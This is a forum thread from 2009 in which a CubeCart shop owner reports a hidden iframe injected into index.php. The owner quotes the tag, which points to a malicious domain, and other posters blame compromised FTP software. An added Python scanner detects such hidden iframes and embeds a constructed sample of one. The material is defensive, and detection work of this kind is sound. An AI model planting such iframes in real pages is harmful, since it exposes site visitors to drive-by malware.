Guest tiptoncp (posted November 9, 2009)

The particular site is still in development on a closed system, although the admin screen is still accessible for development login purposes. I just realized that the site had been hacked and there was an encoded script injected at the bottom of the index.php file in the main directory. The script is linked to a high risk malicious domain. This is the iframe it injected. I did not decode the script, so I don't know if this is all it was doing or not.

<iframe width="635" height="586" style="display: none;" src="http://besenok.org/stds/go.php?sid=1&12694ea4d" name="f884005"/>

I saw the update that apparently fixes some vulnerabilities with sessions. When I implemented it, it screwed up all of my user/superuser admin dashboards. The access rights were still correct, as it would prompt saying you did not have access to this page if you were just an admin, but instead of hiding the links like before, it was showing everything. I have looked at the new code for the sessions, but I cannot find anything linked to the visibility of the inaccessible items. Any ideas?

Also, is the sessions fix directly related to the attack I mentioned above?

Thanks

Robsta (posted November 9, 2009)

You need to contact your hosting company as they will be able to trace the hack. It may not have come in via CubeCart, but through someone else on that server. It's important to keep software on servers up-to-date to help prevent this type of thing; if someone else on the server has not upgraded their software, the hack may have come in through there. Either way, your hosting company needs to know.

Guest tiptoncp (posted November 23, 2009)

Yea, they were notified. But, any idea on why the Session's Fix CC put out around that time would make my permissions get all out of whack?

Ausy (posted November 23, 2009)

> Yea, they were notified. But, any idea on why the Session's Fix CC put out around that time would make my permissions get all out of whack?

Which of the session fixes have you implemented? Have you made all the security updates recently released?

Guest tiptoncp (posted November 23, 2009)

You brought up a good point that I didn't even think about...

Running 4.3.0, implemented this patch http://forums.cubecart.com/index.php?showtopic=39766

Makes my admin panel fully visible regardless of permissions. However, permissions are still intact and prompts a message saying access restricted when clicking on something.

So, I guess I need to implement the changes from 4.3.0 to 4.3.5 and then implement this patch. Usually, security patches are stand alone in version number. The site and admin panel are heavily modified. So, I try to only do security updates.

If you have any other ideas, let me know. Otherwise, I'll go back and start implementing the previous patches.

Ausy (posted November 23, 2009)

I think if you did the patch you linked to, then no need to do the previous sessions patch. I was just checking that you had done the latest one.

Guest tiptoncp (posted November 23, 2009)

Oh, no. I haven't done the latest one. Just saw it today, actually.

Well... I'm not sure why 4.3.6 would change everything then... but it does. I looked at the code. Maybe I missed it, but I didn't see anything related to visibility of items. Which, I wouldn't expect it to be. So, I'm a bit lost as to why it has an effect on that.

Guest asafisk (posted November 30, 2009)

The only time I've seen this before is when someone used compromised FTP software to upload files. The FTP program (I forget the name now) inserted an iframe in any 'index.' file that was uploaded.

I guess FTP software could become compromised in a number of ways, the two most likely being:

1. the FTP software has been hacked before being installed
2. there is a virus on the PC which has contaminated the FTP software

Of course you would need to change the FTP login details as these will most likely have been reported to the iframe host. If you have uploaded files to other sites they should also be checked.

I would recommend running good antivirus (my favourite at the moment is Kaspersky) and removing and replacing the FTP software with something clean and secure. I quite like SmartFTP.

The iframe can then be removed manually and the file re-uploaded.

Guest tiptoncp (posted November 30, 2009)

Hmm, interesting. Thanks for the info. I'll look into that.
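
Added example (not part of the thread and not CubeCart code): a Python check for the symptom described above, a hidden iframe in files named index.*, which also reports whether the tag sits below the closing </html> as in the first post. The function names, the SAMPLE page and the malicious.example host are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Attributes commonly used to keep an injected frame invisible to visitors.
HIDDEN_RE = re.compile(
    r"""display\s*:\s*none|visibility\s*:\s*hidden"""
    r"""|\b(?:width|height)\s*=\s*["']?[01]["']?(?![\w%])""", re.IGNORECASE)
HTML_END_RE = re.compile(r"</html\s*>", re.IGNORECASE)

# Constructed sample: a page with a hidden frame appended after </html>.
SAMPLE = ('<html><body>shop</body></html>\n'
          '<iframe width="635" height="586" style="display: none;" '
          'src="http://malicious.example/go.php?sid=1" name="f1"/>\n')

def find_hidden_iframes(text):
    """Return one dict per hidden <iframe>; 'appended' means below </html>."""
    end = HTML_END_RE.search(text)
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = m.group(1)
        if not HIDDEN_RE.search(attrs):
            continue  # visible frames are left for manual review
        src = SRC_RE.search(attrs)
        hits.append({"src": src.group(1) if src else "",
                     "line": text.count("\n", 0, m.start()) + 1,
                     "appended": bool(end) and m.start() >= end.end()})
    return hits

def scan_webroot(root, pattern="index.*"):
    """Check every file matching pattern under root; map path -> findings."""
    report = {}
    for path in sorted(Path(root).rglob(pattern)):
        if path.is_file():
            hits = find_hidden_iframes(
                path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    # Throwaway web root: one infected index.php, one clean admin/index.html,
    # and about.php, which the default index.* pattern does not cover.
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "admin").mkdir()
        for rel, body in {"index.php": SAMPLE, "about.php": SAMPLE,
                          "admin/index.html": "<html></html>"}.items():
            (Path(root) / rel).write_text(body, encoding="utf-8")
        return scan_webroot(root)
```

Passing pattern="*.php" (or "*") widens the scan beyond index files when checking the other sites that were uploaded to with the same FTP client.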